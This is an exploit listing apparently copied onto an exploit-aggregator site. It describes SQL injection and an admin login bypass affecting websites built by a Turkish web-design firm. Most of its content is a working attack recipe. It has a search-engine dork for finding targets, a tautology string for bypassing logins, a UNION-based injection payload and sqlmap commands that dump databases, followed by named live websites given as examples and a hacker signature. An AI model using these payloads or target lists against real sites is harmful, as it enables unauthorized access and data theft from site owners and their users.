Advertisement






*.ozgunwebtasarim.com & yardim.php SQL Injection / Login Bypass

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2018-10-08
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018100073

Below is a copy:

*.ozgunwebtasarim.com & yardim.php SQL Injection / Login Bypass
*.ozgunwebtasarim.com & yardim.php SQL Injection / Login Bypass
--------------------------------------------------------------------------
yardim.php Login Bypass
---------------------------------------------------------------------------

yardim.php Login Bypass

Search Google : inurl:yardim.php?id=
Admin Panel : /admin/

Username : ''Or'='Or''
Password : ''Or'='Or''

Success !

E.g
http://huzuremlakafyon.com/admin
http://aybarsemlak.org/admin

----------------------------------------------------------------------------
site:*.ozgunwebtasarim.com SQL Injection
----------------------------------------------------------------------------

Search Google : site:*.ozgunwebtasarim.com

Admin Panel : /admin/

SQL Injection : *.ozgunwebtasarim.com/kurumsal.php?Git=1

Payload : 

Parameter: Git (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: Git=-6974' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('qkqkq','y
NrZwiHhedjAEgVaHVnBWOyZJiSMABOLwvkuTEoa'),'qzzkq'),NULL,NULL-- LayN

SQLMap Config : sqlmap.py -u *.ozgunwebtasarim.com/kurumsal.php?Git=1 -
D ozgunweb_* --level=5 --risk=3 --no-cast --tables

sqlmap.py -u *.ozgunwebtasarim.com/kurumsal.php?Git=1 --level=5 --risk=3 --no-cast --dbs

E.g

http://ilicaakpinarotel.ozgunwebtasarim.com/kurumsal.php?Git=1
http://yiksan.ozgunwebtasarim.com/kurumsal.php?Git=1
http://www.ozgunwebtasarim.com/kurumsal.php?Git=1

----------------------------------------------------------------------------------------------------
                                         
GOD3ERR COMMUNIST HACKER - FREEDOM TURKEY !
                                         
----------------------------------------------------------------------------------------------------

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.